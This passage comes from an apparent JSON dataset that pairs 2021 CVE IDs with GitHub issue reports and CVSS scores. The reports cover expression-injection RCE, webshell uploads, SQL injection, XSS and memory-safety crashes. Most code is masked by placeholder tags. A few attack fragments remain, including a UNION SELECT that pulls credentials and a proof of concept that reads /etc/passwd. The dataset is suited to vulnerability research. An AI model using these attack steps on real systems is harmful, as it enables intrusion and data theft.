        "description": "There is a critical expression injection RCE vulnerability in this expression engine\uff08\u8be5\u8868\u8fbe\u5f0f\u5f15\u64ce\u5b58\u5728\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff09. The new object can be directly entered when entering the aviator expression, but it is not allowed to call non public static methods. You can use the APITAG to load the BCEL code to complete the RCE. First prepare a malicious APITAG Set the public static method exec to execute arbitrary commands. APITAG APITAG APITAG static\u65b9\u6cd5exec\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\uff09 ERRORTAG Then encode it in BCEL. \uff08\u7136\u540e\u5c06\u5176BCEL\u7f16\u7801\u3002\uff09 ERRORTAG Prepare the vulnerability environment. Use the latest version of aviatorscript. \uff08\u51c6\u5907\u6f0f\u6d1e\u73af\u5883\u3002\u4f7f\u7528\u6700\u65b0\u7248\u7684aviatorscript\u3002\uff09 CODETAG Perform aviator expression injection. \uff08\u8fdb\u884caviator\u8868\u8fbe\u5f0f\u6ce8\u5165\u3002\uff09 CODETAG The command was executed successfully. \uff08\u6210\u529f\u6267\u884c\u547d\u4ee4\u3002\uff09 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41868",
        "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1396",
        "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1396",
        "Repo_new": "onionshare/onionshare",
        "Issue_Created_At": "2021-08-21T11:13:36Z",
        "description": "File uploaded before checking for user's authentication. Version: APITAG cli NUMBERTAG installed via pip3) Start up: onionshare cli receive Observed behavior: Unauthenticated users (not passing the APITAG Basic_ header) are still able to upload files on the remote machine running APITAG NUMBERTAG The problem is probably related to the logic in FILETAG in which files are uploaded and stored remotely before checking for user authentication. This issue is affecting both: POST /upload POST /upload ajax Proof of concept images attached FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41921",
        "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/62",
        "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/62",
        "Repo_new": "201206030/novel-plus",
        "Issue_Created_At": "2021-09-29T03:20:17Z",
        "description": "There is unrestricted file upload in your source code.. File path: PATHTAG Code: It allows unrestricted file upload. ERRORTAG Achieve the purpose of attacking the server by uploading evil jsp files. Example: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41938",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/64",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/64",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2021-09-30T03:31:31Z",
        "description": "After entering the management page\uff0cthere is an arbitrary file upload vulnerability in NUMBERTAG locations. Affects version APITAG After entering the management page as admininstrator there is an arbitrary file upload vulnerability in NUMBERTAG locations , you can upload webshell into the site. The first location: APITAG the post url is APITAG the step is NUMBERTAG download the default theme from FILETAG NUMBERTAG unzip the zip NUMBERTAG Only delete files with \"php\" suffix due to file security check, new a evil file named FILETAG or APITAG in the \"css\" folder and the root folder FILETAG FILETAG NUMBERTAG Recompress the file as a new zip file NUMBERTAG upload it you will find the evil file is in APITAG and APITAG FILETAG The second location: APITAG the post url is APITAG like the first location NUMBERTAG download a casual plugin from FILETAG like this NUMBERTAG unzip the zip NUMBERTAG new a evil file named FILETAG in the APITAG folder NUMBERTAG Recompress the file as a new zip file NUMBERTAG upload it you will find the evil file is in APITAG FILETAG The third location: APITAG the post url is APITAG the step is NUMBERTAG new a evil file APITAG and compress the file as a new zip file NUMBERTAG upload it you will find the evil file in APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-41945",
        "Issue_Url_old": "https://github.com/encode/httpx/issues/2184",
        "Issue_Url_new": "https://github.com/encode/httpx/issues/2184",
        "Repo_new": "encode/httpx",
        "Issue_Created_At": "2022-04-21T03:46:42Z",
        "description": "Some URL can make httpx use URL with wrong info. After some research, I found that APITAG and APITAG may implicit parse wrong URL because of the improper implement of APITAG . And this issue may lead to some blacklist bypass. For example: APITAG CODETAG APITAG CODETAG Main reason: URLTAG APITAG parse ERRORTAG before returning the new URL, but the new URL string return by ERRORTAG may make some unintended changes on the new URL. For example: ERRORTAG So if a function is using APITAG , it may have the same issue as APITAG and APITAG , too APITAG example, APITAG ). I also made a patch PR for this issue by replacing ERRORTAG to: APITAG By the way, I think this issue is similar to FILETAG and FILETAG . If you want to assign a CVE id for this issue to remind httpx's user, you can use these categories.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41947",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/887",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/887",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2021-09-28T06:23:17Z",
        "description": "SQL injection in visual mode. Login as admin Go to \" URLTAG UNION ALL SELECT username, password FROM sbr NUMBERTAG members APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-41948",
        "Issue_Url_old": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
        "Issue_Url_new": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
        "Repo_new": "intelliants/subrion-plugin-contact_us",
        "Issue_Created_At": "2021-09-28T06:48:55Z",
        "description": "1 click stored XSS from admin panel to site. Login into admin panel Go to APITAG Insert into List of subjects APITAG Go to APITAG Click subject FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-41952",
        "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1",
        "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/1",
        "Repo_new": "hieuminhnv/zenario-cms-last-version",
        "Issue_Created_At": "2021-09-30T08:49:15Z",
        "description": "XSS upload file to .SVG in Zenario CMS NUMBERTAG Summary hi team, I found small XSS upload file to SVG. Info NUMBERTAG Zenario CMS NUMBERTAG last version NUMBERTAG APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Login to account URLTAG FILETAG NUMBERTAG Choose Users & Contacts and create any user NUMBERTAG Click Image >> Upload an image FILETAG NUMBERTAG use burpsuite and capture request file a.svg FILETAG NUMBERTAG click to image avatar >> click right mouse >> Inspect Element (F NUMBERTAG found to link vlun svg FILETAG NUMBERTAG Copy domain >> open web >> BOOM XSS alert message FILETAG Inpact : Attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-41959",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4781",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4781",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-09-27T07:23:09Z",
        "description": "Unfreed float causing memory leak in ecma regexp object. APITAG revision NUMBERTAG ff5bf Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Backtrace ERRORTAG Expected behavior According to our analysis, the root cause of this assertion failed is at PATHTAG While getting next_set_status, function ecma op object APITAG called function APITAG which alloc a NUMBERTAG bit chunk memory use as a float number if index is larger than NUMBERTAG ffffff. This chunk is not freed, causing assertion failed. To repair, ecma_make_length_value(index) should be replaced by last_index created by ecma regexp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42006",
        "Issue_Url_old": "https://github.com/gpertea/gclib/issues/11",
        "Issue_Url_new": "https://github.com/gpertea/gclib/issues/11",
        "Repo_new": "gpertea/gclib",
        "Issue_Created_At": "2021-10-04T15:26:20Z",
        "description": "Uninitialized GFF line info causes out of bounds read, possible out of bounds write.. Reproduce APITAG Input : FILETAG Steps to Reproduce NUMBERTAG Compile FILETAG (will fetch APITAG NUMBERTAG Decompress APITAG input: APITAG NUMBERTAG Run: APITAG Output: APITAG Root Cause URLTAG When APITAG reads a GFF line with no info segment, the APITAG at APITAG will not be set, causing it to take on whatever stale value happens to be in that location of the stack. Triggered accidentally, this can cause a segfault due to reading an invalid address here: URLTAG However, a maliciously crafted input may be able to place a valid pointer at this location, causing a more severe vulnerability. Proposed Patch At a minimum, t should be zeroed during initialization: ERRORTAG Ideally, the library should gracefully handle no info being found (this only works if t is zero initialized): ERRORTAG Credit This bug was detected using AFL URLTAG and localized using ARCUS URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42057",
        "Issue_Url_old": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
        "Issue_Url_new": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
        "Repo_new": "blacksmithgu/obsidian-dataview",
        "Issue_Created_At": "2021-11-04T19:08:34Z",
        "description": "Arbitrary Code Execution via APITAG Queries ( CVETAG ). Describe the bug I discovered a way to craft malicious markdown files that will cause the obsidian dataview plugin to execute arbitrary commands on users\u2019 systems. This is due to the unsafe use of eval within the APITAG URLTAG function located in PATHTAG This has been assigned a CVE of CVETAG CVETAG for tracking. To Reproduce The following proof of concept can be used to display a file on a user\u2019s system by executing the cat command: APITAG dataviewjs APITAG /etc/passwd NUMBERTAG stdout NUMBERTAG dv.span(stdout));\"\" APITAG ` A malicious user could leverage this vulnerability to execute arbitrary code on other users' systems by getting them to open an untrusted markdown file. This is especially dangerous in environments where users share vaults. Expected behavior APITAG should not make an unsafe call to eval using user supplied input. Additional Context Shortly after we privately disclosed this issue, MENTIONTAG promptly changed the default behavior of Dataview to no longer enable APITAG Queries by default (see release FILETAG . This helps protect new dataview users and provides a way for existing dataview users to mitigate this issue by disabling the APITAG Query functionality when opening untrusted markdown. MENTIONTAG is currently working on additional solutions and provided permission for us to open a public issue here for tracking.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42171",
        "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2",
        "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/2",
        "Repo_new": "hieuminhnv/zenario-cms-last-version",
        "Issue_Created_At": "2021-10-05T10:49:07Z",
        "description": "Upload file to RCE in Zenario CMS NUMBERTAG Summary hi team, I found high Upload file to RCE. Info Zenario CMS NUMBERTAG last version APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Login to account URLTAG FILETAG NUMBERTAG Choose Documents >> Upload documents FILETAG NUMBERTAG Use burpsuite and capture request file FILETAG FILETAG NUMBERTAG Click Edit document metadata >> use burpsuite to capture >> save FILETAG NUMBERTAG In value current_value , edit value html to php FILETAG NUMBERTAG Click Actions >> view public link FILETAG APITAG link to URL >> BOOM FILETAG Inpact : An attacker could upload a dangerous executable file like a virus, malware, etc.. The web server can be compromised by uploading and executing a web shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-42185",
        "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/12",
        "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/12",
        "Repo_new": "shadoweb/wdja",
        "Issue_Created_At": "2021-10-06T08:00:02Z",
        "description": "Wdja NUMBERTAG has a foreground SQL injection vulnerability. There is an SQL injection vulnerability in the foreground search function, through which an attacker can get the background account password",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42195",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/174",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/174",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2021-10-07T13:17:16Z",
        "description": "heap buffer overflow exists in the function APITAG in swfdump.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e8d3 at pc NUMBERTAG aca bp NUMBERTAG fffffffdee0 sp NUMBERTAG fffffffded0 READ of size NUMBERTAG at NUMBERTAG e8d3 thread T NUMBERTAG ac9 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG e8d3 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9cc NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9cd NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9ce0: fa fa fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0c7fff9cf NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42198",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/168",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/168",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2021-10-07T12:57:51Z",
        "description": "A NULL pointer dereference exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fac bp NUMBERTAG ffffed NUMBERTAG e0 sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG fab in APITAG PATHTAG NUMBERTAG bf8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG acd in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING POC URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42204",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/169",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/169",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2021-10-07T13:00:58Z",
        "description": "heap buffer overflow exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efdf at pc NUMBERTAG d bp NUMBERTAG fffffffdbe0 sp NUMBERTAG fffffffdbd0 READ of size NUMBERTAG at NUMBERTAG efdf thread T NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc in APITAG APITAG NUMBERTAG fbc in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG efdf is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fd fd fd fd fa[fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42227",
        "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/336",
        "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/336",
        "Repo_new": "kindsoft/kindeditor",
        "Issue_Created_At": "2021-10-14T06:26:59Z",
        "description": "There is a stored xss vulnerability in kindeditor NUMBERTAG APITAG description] > Cross APITAG Scripting (XSS) vulnerability exists in APITAG NUMBERTAG ia > a Google search PATHTAG and then the .html > file on the website that uses this editor (the file suffix is allowed). > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > URLTAG > > > > APITAG Product Code Base] > kindeditor NUMBERTAG APITAG Component] > POST PATHTAG HTTP NUMBERTAG Content Disposition: form data; APITAG APITAG > Content Type: text/html > > APITAG APITAG NUMBERTAG APITAG Type] > Remote > > > > APITAG Code execution] > true > > > > APITAG Vectors] > You just need to search in google: PATHTAG > Then upload the .html file on the website that uses this editor (the file suffix is allowed)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42242",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/28",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/28",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2021-10-10T14:34:59Z",
        "description": "Administrator Interface Command Execution Vulnerability. Vulnerability summary A command execution vulnerability exists in jfinal_cms NUMBERTAG JDK version requirements\uff1a JDK version used based on RMI NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG JDK version used based on LDAP NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG jfinal_cms version NUMBERTAG fastjson APITAG FILETAG vulnerability recurrence JDK version used in the test: JDK8u NUMBERTAG Run the tool on kali, start rmi and ldap services URLTAG APITAG FILETAG replace rmi or ldap address in payload: CODETAG Create the FILETAG file and copy the payload in FILETAG Log in to the Backstage management system, select template management default password:admin/admin NUMBERTAG FILETAG Click FILETAG FILETAG Click Replace file FILETAG Replace with the FILETAG file containing the payload just created FILETAG Visit /ueditor, execute the command to pop up the calculator APITAG FILETAG Vulnerability analysis APITAG The APITAG class is instantiated in the index method of the /ueditor route FILETAG APITAG The APITAG class is instantiated in the constructor of the APITAG class FILETAG APITAG The construction method of APITAG calls APITAG FILETAG APITAG Call APITAG to parse the file content, and the file content here is controllable, just replace the file content with the payload. FILETAG APITAG The file comes from APITAG . With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42244",
        "Issue_Url_old": "https://github.com/PaquitoSoft/Notimoo/issues/3",
        "Issue_Url_new": "https://github.com/paquitosoft/notimoo/issues/3",
        "Repo_new": "paquitosoft/notimoo",
        "Issue_Created_At": "2021-08-12T20:12:15Z",
        "description": "XSS via title, message. FILETAG NUMBERTAG has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification. FILETAG POC Create a notification with a javascript payload: ERRORTAG Affected lines: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42248",
        "Issue_Url_old": "https://github.com/tidwall/gjson/issues/237",
        "Issue_Url_new": "https://github.com/tidwall/gjson/issues/237",
        "Repo_new": "tidwall/gjson",
        "Issue_Created_At": "2021-10-08T09:28:45Z",
        "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a redos via crafted JSON input.. func APITAG { APITAG := APITAG APITAG APITAG }",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42248",
        "Issue_Url_old": "https://github.com/tidwall/gjson/issues/236",
        "Issue_Url_new": "https://github.com/tidwall/gjson/issues/236",
        "Repo_new": "tidwall/gjson",
        "Issue_Created_At": "2021-10-01T04:53:27Z",
        "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a redos via crafted JSON input.. func APITAG { APITAG := APITAG APITAG APITAG }",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42341",
        "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/459",
        "Issue_Url_new": "https://github.com/openrc/openrc/issues/459",
        "Repo_new": "openrc/openrc",
        "Issue_Created_At": "2021-10-08T01:34:40Z",
        "description": "checkpath APITAG invalid pointer. I am a long time Gentoo user. I run Gentoo stable and unstable on a wide range of machines. On just one, a Gentoo unstable, running on a znver2 CPU, I get this error: APITAG This has persisted for months. I have done \"emerge e world\" many times, with various mtune, march, etc. and nothing affects the result. So I did a \"git pull, and looked at PATHTAG Then make this one change: CODETAG The problem goes away. Looks like APITAG is just a wrapper on APITAG According to \"man strlen\" ERRORTAG Looks to me like \"str\" is not big enough to hold \"path\" incuding its trailikng NUMBERTAG No idea how that makes \"free(path);\" fail. But I'm glad it does. .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42341",
        "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/418",
        "Issue_Url_new": "https://github.com/openrc/openrc/issues/418",
        "Repo_new": "openrc/openrc",
        "Issue_Created_At": "2021-04-07T17:25:51Z",
        "description": "PATHTAG is broken in most recent release. CODETAG Not sure what's going on here, so I straced it: CODETAG ltrace: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42585",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/351",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/351",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2021-06-07T07:50:57Z",
        "description": "Heap buffer overflow in copy_compressed_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_compressed_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42586",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/350",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/350",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2021-06-07T07:46:30Z",
        "description": "Heap buffer overflow in copy_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42715",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1224",
